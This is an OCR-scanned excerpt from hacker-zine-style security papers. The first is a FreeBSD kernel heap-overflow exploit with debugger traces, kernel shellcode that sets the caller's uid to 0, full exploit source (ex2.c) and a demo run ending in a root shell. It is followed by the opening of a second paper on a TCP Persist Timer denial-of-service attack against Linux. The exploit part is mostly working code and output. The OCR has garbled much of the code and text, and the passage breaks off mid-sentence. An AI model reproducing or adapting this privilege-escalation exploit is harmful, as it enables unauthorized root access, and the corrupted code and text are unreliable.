#Y) doug 12" 
*] bug: 13: 
*] bug: 14: 
A) bugis 5: 
*]) ‘bugs. 16% 
A bugs 17 


kldstat | grep bug 


00 2000 bug.ko 
gcc exl.c -o exl 
./exl 


on the 256 zone: 4 

items from the 256 zone 

at 0xc243c200 

at 0xc2593300 

at 0xc2381a00 

at 0xc243b300 
on the 256 zone: 30 

15 evil items on the 256 zone 
ake uma_keg_t) = 0x28202180 
at 0xc25e7000 

at Oxc25e6e00 

at O0xc25e6d00 

at Oxc25e6c00 

at Oxc25e6b00 

at O0xc25e6a00 


item at 0xc25e6900 
item at 0xc25e6800 
item at 0xc25e6700 
item at 0xc25e6600 
item at 0xc25e6500 
item at 0xc25e6400 
item at 0xc25e6300 
item at 0xc25e6200 
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[*] bug: 18: item at 0xc25e6100 
---[ deallocating the last 15 items from the 256 zone 


Fatal trap 12: page fault while in kernel mod 
cpuid = 0; apic id = 00 


fault virtual address = 0x41424344 

fault code = supervisor read, page not present 

instruction pointer = 0x20:0x41424344 

stack pointer = 0x28:0xcd074c14 

frame pointer = 0x28:0xcd074c4c 

code segment = base 0x0, limit Oxfffff, type Oxlb 
= DPL 0, pres 1, def32 1, gran 1 

processor eflags = interrupt enabled, resume, IOPL = 0 

current process = 767 (exl) 

[thread id 767 tid 100050 ] 

Stopped at 0x41424344;: *** error reading from address 41424344 *x** 

db> 


// We have successfully diverted execution to the 0x41424344 address. 
// Let’s explore the UMA data structures. First, the edge item of the 
// exploited slab: 


db> x/x Oxc25e6e00,4 
Oxc25e6e00: 0 0 0 0 


// By examining the uma_slab_head structure of the exploited slab we can 
// see that we have overwritten its us_keg element [2-13] with the address 
// of our userland buffer (0x28202180): 

db> x/x Oxc25e6fa8,4 

Oxc25e6fa8: 28202180 c2593fa8 c25e7fac 0 


// We continue by examining our fake uma_keg structure that us_keg is now 
// pointing to. The uk_zones element [2-6] of our fake uma_keg structure 
// points further down our userland buffer to the fake uma_zone structure 
// at 0x28202200. 

db> x/x 0x28202180,10 


0x28202180: c1474880 c1474980 cOb8682c cObd82fa 
0x28202190: 1430000 0 4 0 
0x282021a0: 0 0 0 28202200 
0x282021b0: c32affal 0 c32b3fa8 0 


// We can now verify that the uz_dtor function pointer of the fake uma_zone 
// structure contains 0x41424344 (and that uz_keg [2-1] at 0x28202208 

// points back to our fake uma_keg): 

db> x/x 0x28202200,10 


0x28202200: cOb867ec c1474908 28202180 0 
0x28202210: c147492c 0 0 0 
0x28202220: 41424344 0 0 a32 
0x28202230: 0 8d9 0 0) 


SSssiP <4 Kernel shellcod 


Since we have verified that we can divert the kernel’s execution flow and 
we have a place to store the code we want executed (again, in the userland 
buffer passed as an argument to the vulnerable system call) we will now 
briefly discuss the development of kernel shellcode for FreeBSD. There is 
no need to go into extensive details on this since previous published work 
on the subject by the "Kernel wars" authors [21] and noir [22] have 
analyzed it sufficiently. Although noir presented OpenBSD specific kernel 
shellcode, the sysct1(3) technique of leaking the address of the process 
structure from unprivileged userland code is applicable to FreeBSD as 
well. In our kernel shellcode we use a simpler approach to locate the 
process structure first presented in [21]. 


We want to create a small shellcode that patches the credentials record 
for the user running the exploit. To do that we will locate the proc 
struct for the running process, then update the ucred struct that the 
process is associated with. 
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FreeBSD/i386 uses the segment fs in kernel-context to point to the per-cpu 
variable __pcepu[n] [23]. This structure holds information for the cpu of 
the current context like current thread among other data. We use this 
segment to quickly get hold of the proc pointer for the currently running 
process and eventually the credentials of the owner user of the process. 


To easily figure out the offsets in the structs used by the kernel we get 
some help from gdb, the symbol read is just used to reference addressabl 
memory: 


$ gdb /boot/kernel/kernel 


(gdb) print /x (int)&((struct thread *) &read) ->td_proc-\ 
(int) (struct thread *) &read 

S1 = 0x4 

(gdb) print /x (int)&((struct proc *) &éread) ->p_ucred-\ 

(int) (struct proc *) &éread 

$2 = 0x30 

(gdb) print /x (int)&((struct ucred *) &read)->cr_uid-\ 
(int) (struct ucred *)&read 

$3 = 0x4 

(gdb) print /x (int)&((struct ucred *) &read) ->cr_ruid-\ 
(int) (struct ucred *) &read 

S4 = 0x8 


Knowing the offsets we can now describe our shellcode in detail: 


1. Get the curthread pointer by referring to the first word in the struct 
pcpu [23]: 
movl Sfs:0, %eax 


2. Extract the struct proc pointer for the associated process [24]: 
movil 0x4 (%eax), %Seax 


3. Get hold of the process owner’s identity [25] by getting the struct 
ucred for that particular process: 
movil 0x30 (%eax), eax 


4. Patch struct ucred by writing uid=0 on both th ffective user ID 
(cr_uid) and real user ID (cr_ruid) [26]: 


xorl SeECX, %SECX 
movl Secx, 0x4 (%eax) 
movil Secx, 0x8 (%eax) 


5. Restore us_keg [2-13] for our overwritten slab metadata, we use the 
us_keg pointer found in the next uma_slab_head as will be discussed in 
the next subsection, 4.2: 


movil O0x1000(%esi), %eax 
movil Seax, (%eSi1) 


6. Return from our shellcode and enjoy uid=0 privileges: 
ret 


----[ 4.2 - Keeping the system stable 


After our kernel shellcode has been executed, control is returned to the 
kernel. Eventually the kernel will try to free an item from the zone that 
uses the slab whose uma_slab_head structure we have corrupted. However, 
the memory regions we have used to store our fake structures have been 
unmapped when our process has completed. Therefore, the system crashes 
when it tries to dereference the address of the fake uma_keg structure 
during a free(9) call. 


H 


n order to find a way to keep the system stable after returning from the 
execution of our kernel shellcode we fire up our exploit with any kind of 
kernel shellcode, execute it, and we single step in ddb(4) (after we have 
nabled a relevant breakpoint or watchpoint of course) until we reach the 
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call of the uz_dtor function pointer: 


[thread pid 758 tid 100047 ] 
Stopped at uma_zfree_arg+0x2d: calll *Sedx 


// Above we can see the call instruction in uma_zfree_arg() where uz_dtor 
// is used. Let’s examine the state of the registers at this point: 
db> show reg 


cs 0x20 
ds 0x28 
es 0x28 
fs 0x8 
ss 0x28 
eax Oxc25d5e00 
ecx Oxc25d5e00 
edx 0x28202260 
ebx 0x100 
esp Oxcd068c14 
ebp Oxcd068c48 
esi Oxc25d5fa8 
edi 0x28202200 
eip Oxc09e565d uma_zfree_argt0x2d 
efl 0x206 
db> x/x Sesi 

Oxc25d5fa8: 28202180 


// Although we have not included the relevant output, we know (see previous 
// executions of exl.c earlier in the paper) from the execution of our 

// exploit that we have corrupted the 0xc25d5fa8 slab. We can see that at 
// this point the %esi register holds the address of this slab. We can 

// also see that the us_keg element ([2-13], first word of uma_slab_head) 
// of uma_slab_head points to our userland buffer (0x28202180). What we 
// need to do is restore the value of us_keg to point to the correct 

// uma_keg. Since we know the UMA architecture from section 2, we only 

// need to look for the correct address of uma_keg at the next or the 

// previous slab from the one we have corrupted: 

db> x/x Oxc25d6fa8 

Oxc25d6fa8: c1474900 


In order to ensure kernel continuation we can perform an additional check 
by making sure that the next or the previous slab is indeed a valid one and 
its us_keg pointer is not NULL. 


Now we know how to dynamically restore at run time from our kernel 
shellcode the value of the corrupted us_keg to contain the address of the 
correct uma_keg structure. 


Putting it all together, we have below the complete exploit (file ex2.c in 
the code archive): 


include <stdio.h> 
include <stdlib.h> 
include <string.h> 
include <unistd.h> 
include <sys/syscall.h> 
include <sys/types.h> 
include <sys/module.h> 


define EVIL_SIZE 428 /* causes 256 bytes to be allocated */ 
define TARGET SIZE 256 

#define OP_ALLOC 1 

define OP_FREE 2 

define BUF_SIZE 256 

define LINE_SIZE 56 

define ITEMS PER SLAB 15 /* for the 256 anonymous zone */ 
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struct argz 

{ 
char *buf; 
u_int len; 
int op; 
u_int slot; 

}; 


int get_zfree(char *zname) ; 


u_char kernelcode[] = 


"\x64\xal\x00\x00\x00\x00" /* movl %fs:0, %eax */ 
"\x8b\x40\x04" /* movl Ox4(%eax), %eax */ 
"\x8b\x40\x30" /* movl 0x30(%eax), %eax */ 
"\x31\xc9Q" /* xorl %ecx, %ecx */ 
"\x89\x48\x04" /* movl %ecx, O0x4(%eax) */ 
"\x89\x48\x08" /* movl %ecx, O0x8(%eax) */ 
"\x8b\x86\x00\x10\x00\x00" /* movl 0x1000(%esi), %eax */ 
"\x83\xf£8\x00" /* compl $0x0, %eax */ 
"\x74\x02" /* Je prev */ 
"\xeb\x06" /* jmp end */ 
/* prev: */ 
"\x8b\x86\x00\xf0\xff\xf£f" /* movl -0x1000(%esi), %eax */ 
/* end: */ 
"\x89\x06" /* movl %eax, (%eSi) */ 
"\xe3"} /* ret */ 


int 
main(int argc, char *argv[]) 
{ 
PAC? Shy Ayo) Ny 
char *ptr; 
u_long *lptr; 
struct module_stat mstat; 
struct argz vargz; 


sn 1 5 n 0; 


n = get_zfree("256"); 


printf (" [ ‘tx items on the %d zone: %d\n", TARGET _SIZE, n); 
vargz.len = TARGET_SIZE; 

vargz.buf = calloc(vargz.len + 1, sizeof(char)); 

if (vargz.buf == NULL) 


{ 
perror("calloc"); 
exit(1); 

} 


memset (vargz.buf, 0x41, vargz.len); 


mstat.version = sizeof (mstat); 
modstat (modfind("bug"), &mstat); 
sn = mstat.data.intval; 

vargz.op = OP_ALLOC; 


printf ("---[ consuming %d items from the %d zone\n", n, TARGET_SIZE 


for(i = 0; i < n; itt) 
{ 
vargz.slot = i; 
syscall(sn, vargz); 


n = get_zfree ("256"); 
printf (" [ fr items on the %d zone: %d\n", TARGET _SIZE, n); 
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printf("---[ allocating %d evil items on the %d zone\n", 


ITEMS_PER_SLAB, 


free (vargz.buf); 
vargz.len = EVI 
vargz.buf = 


1 SIZE; 


if (vargz.buf == NULL) 
{ 
perror("calloc"); 
exit (1); 
} 


calloc(vargz.len, 


TARGET_SIZE); 


/* build the overflow buffer */ 


ptr = (char *)vargz.buf; 
printf("---[ userland 
lptr = (u_long *) (vargz.buf + 


/* overwrite th 


real uma_slab 


(fake uma_keg_t) 


EVIL_SIZE 


sizeof (char)); 


Ox%.8x\n", 


= 47 


head struct */ 


*lptrt++ = (u_long)ptr; /* us_keg */ 
/* build the fake uma_keg struct (us_keg) */ 
lptr = (u_long *)vargz.buf; 

*lotr 0xc1474880; /* uk_link */ 
*lotr 0xc1474980; /* uk_link */ 
*lptr Oxc0b8682c; /* uk_lock */ 
*lptr OxcObd82fa; /* uk_lock */ 
*lptr 0x1430000; /* uk_lock */ 
*lptr 0x0; /* uk_lock */ 
*lptr 0x4; /* uk_lock */ 
*lptr 0x0; /* uk_lock */ 
*lptr 0x0; /* uk_hash */ 
*lptr 0x0; /* uk_hash */ 
*lptr 0x0; /* uk_hash */ 
ptr = (char *) (vargz.buf + 128); 
*lptr (u_long)ptr; /* fake uk_zones */ 
*lptr Oxc32affa0; /* uk_part_slab */ 
*lptr 0x0; /* uk_free_slab */ 
*lptr Oxc32b3fa8; /* uk_full_slab */ 
*lptr 0x0; /* uk_recurse */ 
*lptr 0x3; /* uk_align */ 
*lptr Oxla; /* uk_pages */ 
*lptr Oxd; /* uk_free */ 
*lptr 0x100; /* uk_size */ 
*lptr 0x100; /* uk_rsize */ 
*lptr 0x0; /* uk_maxpages */ 
*lptr 0x0; /* uk_init */ 
*lptr 0x0; /* uk_fini */ 
*lptr 0xc09e3790; /* uk_allocf */ 
*lptr 0xc09e3750; /* uk_freef */ 
*lptr 0x0; /* uk_obj */ 

*lptr 0x0; /* uk_kva */ 

*lptr 0x0; /* uk_slabzone */ 
*lptr Ox10fa8; /* uk_pgoff && uk_ppera */ 
*lptr Oxf; /* uk_ipers */ 
*lptr 0x10; /* uk_flags */ 
/* build the fake uma_zone struct */ 

*lptr OxcOb867ec; /* uz _name */ 

lptr 0xc1474908; /* uz_lock */ 
ptr = (char *)vargz.buf; 

*Toex (u_long)ptr; /* uz_keg */ 


(UAINnE) per) ; 
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*lptr 0x0; /* uz_link le_next */ 
*lptr 0xc147492c; /* uz_link le_prev */ 
*lptr 0x0; /* uz_full_bucket */ 
*lptr 0x0; /* uz_free_bucket */ 
*lptr 0x0; /* uz_ctor */ 

ptr = (char *) (vargz.buf + 224); /* our kernel shellcode */ 
*lptr (u_long) ptr; /* uz_dtor */ 

*lptr 0x0; /* uz_init */ 

KID RE 0x0; LEONI EIA BY. 

ALper Oxa32; 

*lptr Ox0; 

~Lper 0x8d9; 

*Lptr Ox0; 

AL per Ox0; 

*lptr Ox0; 

*lptr 0x200000; 

*lptr Oxcl46bla4; 

<iptr Oxc146b000; 

sper 0x39; 

*lptr Ox0; 

AL per Ox3a; 

*lptr 0x0; /* end of uma_zone */ 
memcpy (ptr, kernelcode, sizeof (kernelcode) ); 


for(j = 0; j < ITEMS_PER_SLAB; j++, itt) 
{ 

vargz.slot = i; 

syscall(sn, vargz); 


} 


/* free the last allocated items to trigger exploitation */ 
printf("---[ deallocating the last %d items from the %d zone\n", 
ITEMS _PER_SLAB, TARGET_SIZE); 


[t] 


vargz.op = OP_FREE; 


for(j = 0; j < ITEMS_PER_SLAB; j++) 
{ 

vargz.slot =i - j; 

syscall(sn, vargz); 


} 


free (vargz.buf); 
return 0; 


} 


int 

get_zfree(char *zname) 

{ 
u_int nsize, nlimit, nused, nfree, nreq, nfail; 
FILE *fp = NULL; 
char buf [BUF_SIZE]; 
char iname[LINE_SIZE]; 


nsize = nlimit = nused = nfr = nreq = nfail = 0; 


fo = popen("/usr/bin/vmstat -z", "r"); 
if (fp == NULL) 


perror("popen"); 
exit (1); 
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memset (buf, 0, sizeof (buf)); 
memset (iname, 0, sizeof (iname)); 


while (fgets (buf, sizeof(buf) - 1, fp) != NULL) 
{ 
sscanf(buf, "%s %u, %u, Su, %u, Su, Su\n", iname, &nsize, &nlimit, 
énused, é&nfree, &nreq, &nfail); 


if(strncemp(iname, zname, strlen(zname)) == 0) 
{ 
break; 
} 
} 


pclose(fp); 
return nfree; 


} 


Let’s try it: 


argp@julius ~]$ uname -r 
7.2-RELEASE 

argp@julius ~]$ kldstat | grep bug 
4 1 Oxc25b0000 2000 bug.ko 
argp@julius ~]$ id 
uid=1001(argp) gid=1001(argp) groups=1001 (argp) 
argp@julius ~]$ gcc ex2.c -o ex2 
argp@julius ~]$ ./ex2 

[o ir items on the 256 zone: 34 

---[ consuming 34 items from the 256 zone 
*] bug: O: item at 0xc243c800 

*] bug: 1: item at 0xc25b3900 

*] bug: 2: item at 0xc25b2900 

*] bug: 3: item at O0xc25b2a00 

*] bug: 4: item at 0xc25b3800 

*] bug: 5: item at 0xc25b2b00 

*] bug: 6: item at 0xc25b2300 

*] bug: 7: item at 0xc25b2600 

*] bug: 8: item at 0xc2598e00 

*] bug: 9: item at 0xc25b2200 

*] bug: 10: item at 0xc25b2000 

*] bug: 11: item at 0xc2598c00 

*] bug: 12: item at 0xc25b2100 

*] bug: 13: item at 0xc25b3000 

*] bug: 14: item at O0xc25b3b00 

*] bug: 15: item at O0xc25b2d00 

*] bug: 16: item at O0xc25b2c00 

*] bug: 17: item at 0xc25b3600 

*] bug: 18: item at 0xc243c700 

*] bug: 19: item at 0xc25b3400 

*] bug: 20: item at 0xc25b3a00 

*] bug: 21: item at 0xc25b3700 

*] bug: 22: item at 0xc243cc00 

*] bug: 23: item at O0xc243ca00 

*] bug: 24: item at 0xc25b3500 

*] bug: 25: item at 0xc2597300 

*] bug: 26: item at 0xc235d100 

*] bug: 27: item at 0xc2597100 

*] bug: 28: item at 0xc2597600 

*] bug: 29: item at 0xc25b3e00 

*] bug: 30: item at 0xc25b3c00 

*] bug: 31: item at 0xc2597500 

*] bug: 32: item at 0xc2598d00 

*] bug: 33: item at 0xc25b3100 

[te items on the 256 zone: 45 

---[ allocating 15 evil items on the 256 zone 
---[ userland (fake uma_keg_t) = 0x28202180 
[*] bug: 34: item at 0xc25e6800 
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*] bug: 35: item at 0xc25e6700 
*] bug: 36: item at 0xc25e6600 
*] bug: 37: item at 0xc25e6500 
*] bug: 38: item at O0xc25e6400 
*] bug: 39: item at 0xc25e6300 
*] bug: 40: item at 0xc25e6200 
*] bug: 41: item at 0xc25e6100 
*] bug: 42: item at O0xc25e6000 
*] bug: 43: item at Oxc25e5e00 
*] bug: 44: item at O0xc25e5d00 
*] bug: 45: item at Oxc25e5c00 
*] bug: 46: item at 0xc25e5b00 
*] bug: 47: item at 0xc25e5a00 
*] bug: 48: item at 0xc25e5900 

---[ deallocating the last 15 items from the 256 zone 
argp@julius ~]$ id 


uid=0 (root) gid=0(wheel) egid=1001(argp) groups=1001 (argp) 
--[ 5 - Conclusion 


The exploitation technique described in this paper can be applied to 
overflows that take place on memory allocated by the FreeBSD kernel. The 
main requirement for successful arbitrary code execution, in addition to 
having an overflow bug in the kernel, is that we should be able to make 
repeated allocations of kernel memory from userland without having the 
kernel automatically deallocate our items. We also need to have control 
over the deallocation of these items to fully control the process. 
Obviously, the uz_dtor overwrite technique we focused on in this paper is 
only one of the alternatives to achieve code execution; the rest are left 
as an exercise for the interested hacker. 


argp did the research, developed th xploitation methodology, discovered 
how to keep the system stable after arbitrary code execution and wrote 
this paper. karl provided the initial challenge, pointed argp to the 
right direction and improved the kernel shellcode subsection (4.1). 


argp thanks all the clever signedness.org residents for discussions on 
many very interesting topics (cmn, christer, twiz, mu-b, xz and all the 
others). Thanks also to brat for always allowing me to break his 
machines, joy and demonmass for generally being cool. 


karl thanks christer for starting this whole *bsd exploit epoch, and of 
course cmn for endless discussions on how to solve problems. 
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--{ 1 - Introduction 


TCP is the main protocol upon which most end-to-end communications take 
place, nowadays. Being introduced a lot of years ago, where security 
wasn’t as much a concern, has left it with quite a few hanging 
vulnerabilities. It is not strange that many TCP implementations have 
deviated from the official RFCs, to provide additional protective 
measures and robustness. However, there are still attack vectors which 
can be exploited. One of them is the Persist Timer, which is triggered 
when the receiver advertises a TCP window of size 0. In the following 
text, we are going to analyse, how an old technique of kernel memory 
exhaustion [1] can be amplified, extended and adjusted to other forms of 
attacks, by exploiting the persist timer functionality. Our analysis is 
mainly going to focus on the Linux (2.6.18) network stack implementation, 
but test cases for *BSD will be included as well. The possibility of 
exploiting the TCP Persist Timer, was first mentioned at [2]. 

A proof-of-concept tool that was developed for the sole purpose of 
demonstrating the above attack will be presented. Nkiller2 is able to 
perform a generic DoS attack, completely statelessly and with almost no 
memory overhead, using packet-parsing techniques and virtual states. In 
addition, the amount of traffic created is far less than that of similar 
tools, due to the attack’s nature. The main advantage, that makes all the 
difference, is the possibly unlimited prolonging of the DoS attack’s 
impact by the exploitation of a perfectly ’expected & normal’ TCP Persist 
Timer behaviour. 


--[ 2 - TCP Persist Timer theory 


TCP is based on many timers. One of them is the Persist Timer, which is 
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used when the peer advertises a window of size 0. Normally, the receiver 
advertises a zero window, when TCP hasn’t pushed the buffered data to the 
user application and thus the kernel buffers reach their initial 
advertised limit. This forces the TCP sender to stop writing data to the 
network, until the receiver advertises a window which has a value greater 
than zero. To accomplish that, the receiver sends an ACK called a window 
update, which has the same acknowledgment number as the one that 
advertised the 0 window (since no new data is effectively acknowledged) . 


The Persist Timer is triggered when TCP gets a 0 window advertisement for 
the following reason: Suppose the receiver eventually pushes the data 
from the kernel buffers to the user application, and thus opens the 
window (the right edge is advanced). He then sends a window update to the 
sender announcing that it can now receive new data. If this window update 
is lost for any reason, then both ends of the connection would deadlock, 
since the receiver would wait for new data and the sender would wait for 
the now lost window update. To avoid the above situation, the sender 
sets the Perist Timer and if no window update has reached him until it 
xpires, then he resends a probe to the peer. As long as the receiver 
keeps advertising a window of size 0, then the sender follows the process 
again. He sets the timer, waits for the window update and resends the 
probe. As long as some of the probes are acknowledged, without necessarily 
having to announce a new window, the process will go on ad infinitum. 
Examples can be found at [3]. 


Of course, the actual implementation is always more complicated than 
theory. We are going to inspect the Linux implementation of the 

TCP Persist Timer, watch the intricacies unfold and eventually get a 
fairly good perspective on what happens behind the scenes. 


-- [ 3 - TCP Persist Timer implementation 


The following code inspection will mainly focus on the implementation of 
the TCP Persist Timer on Linux 2.6.18. Many of the TCP kernel functions 
will be regarded as black-boxes, as their analysis is beyond the scope of 
this paper and would probably require a book by itself. 


----[ 3.1 - TCP Timer Initialization 


Let’s see when and how the main TCP timers are initialized. During the 
socket creation process tcp_v4_init_sock() will call 
tcp_init_xmit_timers() which in turn calls inet_csk_init_xmit_timers(). 


net/ipv4/tcp_ipv4.c: 


/ \ 
/* NOTE: A lot of things set to zero explicitly by call to 

% sk_alloc() so need not be done here. 

* / 


static int tcp_v4_init_sock (struct sock *sk) 

{ 
struct inet_connection_sock *icsk = inet_csk (sk); 
struct tcp_sock *tp = tcp_sk(sk); 


skb_queue_head_init (&tp->out_of_order_queue) ; 
tcp_init_xmit_timers (sk); 


PRP Saratedy a ip 


net/ipv4/tcp_timer.c: 
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/ \ 


void tcp_init_xmit_timers(struct sock *sk) 
{ 
inet_csk_init_xmit_timers(sk, &tcp_write_timer, &tcp_delack_timer, 
&tcp_keepalive_timer) ; 


As we can see, inet_csk_init_xmit_timers() is the function which actually 
does the work of setting up the timers. Essentially what it does, is to 
assign a handler function to each of the three main timers, as instructed 
by its arguments. setup_timer() is a simple inline function defined at 
"include/linux/timer.h". 


net/ipv4/inet_connection_sock.c: 


/ \ 


/* 
* Using different timers for retransmit, delayed acks and probes 
* We may wish use just one timer maintaining a list of expire jiffies 
* to optimize. 
*/ 
void inet_csk_init_xmit_timers (struct sock *sk, 
void (*retransmit_handler) (unsigned long), 
void (*delack_handler) (unsigned long), 
void (*keepalive_handler) (unsigned long) ) 


struct inet_connection_sock *icsk = inet_csk (sk); 


setup_timer (&icsk->icsk_retransmit_timer, retransmit_handler, 
(unsigned long) sk); 
setup_timer(&icsk->icsk_delack_timer, delack_handler, 
(unsigned long) sk); 
setup_timer(&sk->sk_timer, keepalive_handler, (unsigned long) sk); 
icsk->icsk_pending = icsk->icsk_ack.pending = 0; 


include/linux/timer.h: 


/ \ 


static inline void setup_timer(struct timer_list * timer, 
void (*function) (unsigned long), 
unsigned long data) 


timer->function = function; 
timer->data = data; 
init_timer (timer); 


According to the above, the timers will be initialized with the following 
handlers: 


retransmission timer -> tcp_write_timer () 
delayed acknowledgments timer -> tcp_delack_timer () 
keepalive timer -> tcp_keepalive_timer () 


What interests us, is the tcp_write_timer(), since as we can see from the 
following code, *both* the retransmission timer *and* the persist timer 
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are initially handled by the same function before triggering the more 
specific ones. And there is a reason that Linux ties the two timers. 


net/ipv4/tcp_timer.c: 
/ \ 


static void tcp_write_timer (unsigned long data) 

{ 
struct sock *sk = (struct sock*) data; 
struct inet_connection_sock *icsk = inet_csk (sk); 
int event; 


bh_lock_sock (sk); 
if (sock_owned_by_user(sk)) { 
/* Try again later */ 
sk_reset_timer(sk, &icsk->icsk_retransmit_timer, 
jiffies + (HZ / 20)); 
goto out_unlock; 


} 


if (sk->sk_state == TCP_CLOSE || !icsk->icsk_pending) 
goto out; 


if (time_after(icsk->icsk_timeout, jiffies)) { 
sk_reset_timer(sk, &icsk->icsk_retransmit_timer, 
icsk->icsk_timeout) ; 
goto out; 


vent = icsk->icsk_pending; 
icsk->icsk_pending = 0; 


switch (event) { 

case ICSK_TIME _RETRANS: 
tcp_retransmit_timer (sk); 
break; 

case ICSK_TIME_PROBEO: 
tcp_probe_timer (sk); 
break; 


} 
TCP_CHECK_TIMER (sk) ; 


out: 


sk_mem_reclaim(sk); 
out_unlock: 

bh_unlock_sock (sk) ; 

sock_put (sk); 


Depending on the value of ’icsk->icsk_pending’, then either th 
retransmission_timer real handler -tcp_retransmit_timer()- or the 
persist_timer real handler -tcp_probe_timer()- is called. 
ICSK_TIME_RETRANS and ICSK_TIME PROBEO are literals defined at 
"include/net/inet_connection_sock.h" and icsk_pending is an 8bit member 
of a type inet_sock struct which is defined in the same file. 


include/net/inet_connection_sock.h: 


/ \ 


/** inet_connection_sock - INET connection oriented sock 
* 


* @icsk_pending: Scheduled timer event 


* 


9.txt 


* 
Ay. 


struct inet_connection_sock { 


/* inet_sock has to be the first member! 
icsk_inet; 


struct inet_sock 


Wed Apr 26 09:43:46 2017 


*/ 


TP bie FY 
__u8 icsk_pending; 
/* LAY. 
} 
Lx ar 
define ICSK_TIME_RETRANS 1 /* Retransmit timer */ 
define ICSK_TIME_DACK 2 /* Delayed ack timer */ 
define ICSK_TIME_PROBEO 3 /* Zero window probe timer */ 
define ICSK_TIME_KEEPOPEN 4 /* Keepalive timer */ 
\ 
Leaving the initialization process behind, we need to see how we can 
trigger the TCP persist timer. 
----[ 3.2 - Persist Timer Triggering 


Looking through the kernel cod 


timers, 


for functio 


we fall upon inet_csk_reset_xmit_timer () 


"include/net/inet_connection_sock.h" 


include/net/inet_connection_sock.h: 


ns that trigger/reset the 
which is defined at 


/ 
/* 
* Reset the retransmission timer 
wi 
static inline void inet_csk_reset_xmit_timer(struct sock *sk, 


const 


int what, 


unsigned long when, 
const unsigned long max_when) 


struct inet_connection_sock *icsk = inet_csk (sk); 
if (when > max_when) { 
#ifdef INET_CSK_ DEBUG 
pr_debug ("reset_xmit_timer: sk=%p %d when=0x%1x, 
caller=%p\n", sk, what, when, 
current_text_addr()); 
#endif 
when = max_when; 
} 
if (what == ICSK_TIME_RETRANS || what == ICSK_TIME_PROBEO) { 
icsk->icsk_pending = what; 


icsk->icsk_timeout 


jiffies + when; 


sk_reset_timer(sk, 
icsk->icsk_ 


} else if 


&icsk—->icsk_retransmit_timer, 


time 


(what 


ICSK_TIME_DACK) 


icsk->icsk_ack.pending 
icsk->icsk_ack.timeout 
sk_reset_timer(sk, 
icsk->icsk_ack.timeout) ; 


} 
#ifdef IN 
else 


ET _CSK_D! 
{ 


E BUG 


&ics 


out); 

{ 

= ICSK_ACK_TIM 
jiffies + whe 


E 


ER; 
n; 


k->icsk_delack_timer, 
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pr_debug("%Ss", inet_csk_timer_bug_msg) ; 


} 
#endif 


} 
\ / 


An assignment to ’icsk->icsk_pending’ is made according to the argument 
‘what’. Note the ambiguity of the comment mentioning that the 
retransmission timer is reset. Essentially, however, ither the persist 
timer or the retransmission can be reset through this function. In 
addition, the delayed acknowledgement timer, which won’t interest us, can 
be reset through the ICSK_TIME DACK value. So, whenever 
inet_csk_reset_xmit_timer() is called, it sets the corresponding timer, 
as instructed by argument /’/what’, to fire up after time ’when’ (which 
must be less or equal than ’max_when’) has passed. jiffies is a global 
variable which shows the current system uptime in terms of clock ticks 
A good reference, on how timers in general are managed, is [4]. 

A caller function which sets the argument ’what’ as ICSK_TIME_PROBEO is 
tcp_check_probe_timer(). 


include/net/tcp.h: 
/ \ 


static inline void tcp_check_probe_timer(struct sock *sk, 
struct tcp_sock *tp) 
{ 
const struct inet_connection_sock *icsk = inet_csk (sk); 
if (!tp->packets_out && !icsk-—>icsk_pending) 
inet_csk_reset_xmit_timer(sk, ICSK_TIME_PROBEO, 
icsk->icsk_rto, TCP_RTO_MAX); 


We face two problems before the persist timer can be triggered. First we 
need to pass the check of the if condition in tcp_check_probe_timer(): 


if (!tp->packets_out && !icsk->icsk_pending) 


tp->packets_out denotes if any packets are in flight and have not yet 
been acknowledged. This means that the advertisement of a 0 window must 
happen after any data we have received has been acknowledged by us (as 
the receiver) and before the sender starts transmitting any new data. 
The fact that icsk->icsk_pending should be, 0 denotes that any other timer 
has to already have been cleared. This can happen through the function 
inet_csk_clear_xmit_timer() which in our case can be called by 
tcp_ack_packets_out() which is called by tcp_clean_rtx_queue() which is 
called by tcp_ack() which is the main function that deals with incoming 
acks. tcp_ack() is called by tcp_rcv_established(), in turn called by 
tcp_v4_do_rcev(). The only limitation again for tcp_ack_packets_out() to 
call the timer clearing function, is that ’tp->packets_out’ should be 0. 


net/include/inet_connection_sock.h 


/ \ 


static inline void inet_csk_clear_xmit_timer(struct sock *sk, 
const int what) 


struct inet_connection_sock *icsk = inet_csk (sk); 
if (what == ICSK_TIME_RETRANS || what == ICSK_TIME_PROBEO) { 
icsk->icsk_pending = 0; 
#ifdef INET_CSK_CLEAR_TIMERS 
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sk_stop_timer(sk, &icsk->icsk_retransmit_timer) ; 
#endif 
PR Ape ig PRG 


net/ipv4/tcp_input.c 
f \ 


static void tcp_ack_packets_out (struct sock *sk, struct tcp_sock *tp) 
{ 
if (!tp->packets_out) { 
inet_csk_clear_xmit_timer(sk, ICSK_TIME_RETRANS) ; 
} else { 
inet_csk_reset_xmit_timer(sk, ICSK_TIME RETRANS, 


inet_csk(sk)->icsk_rto, TCP_RTO_MAX) ; 


} 


YRS oie SEY: 

/* Remove acknowledged frames from the retransmission queue. */ 
static int tcp_clean_rtx_queue (struct sock *sk, __s32 *seq_rtt_p) 
{ 

A ace ge PF 


if (acked&FLAG_ACKED) { 
tcp_ack_update_rtt(sk, acked, seq_rtt); 
tcp_ack_packets_out(sk, tp); 


EE tts RE 
} 
Le ros EY, 
} 
BRO tebe Pf 


/* This routine deals with incoming acks, but not outgoing ones. */ 
static int tcp_ack(struct sock *sk, struct sk_buff *skb, int flag) 
{ 


Up Rit eth Ef: 
/* See if we can take anything off of the retransmit queue. */ 
flag |= tcp_clean_rtx_queue(sk, &seq_rtt); 
PFE Ba an BY 
} 
\ / 
The only caller for tcp_check_probe_timer() is __tcp_push_pending_frames () 


which has tcp_push_pending_frames as its wrapper function. 
tcp_push_sending_frames() is called by tcp_data_snd_check() which is 
called by tcp_rcev_established() which as we saw above calls tcp_ack() as 
well 


include/net/tcp.h: 
/ \ 


void __tcp_push_pending_frames (struct sock *sk, struct tcp_sock *tp, 
unsigned int cur_mss, int nonagle) 
{ 
struct sk_buff *skb sk->sk_send_head; 
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if 
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(skb) { 


if (tcp_write_xmit(sk, cur_mss, nonagle) ) 
tcp_check_probe_timer(sk, tp); 


ay 


static inline void tcp_push_pending_frames (struct sock *sk, 


{ 


struct tcp_sock *tp) 


__tcp_push_pending_frames(sk, tp, tcp_current_mss(sk, 1), 


tp->nonagle) ; 


Another problem here is that we have to make tcp_write_xmit() return a 
value different than 0. According to the comments 


the function, 


and the last line of 


the only way to return 1 is by having no packets 


unacknowledged (which are in flight) and additionally by having more 


packets 


that need to be sent on queue. This means 


requested needs to be larger than the initial mss, 


packets 


that the data we 
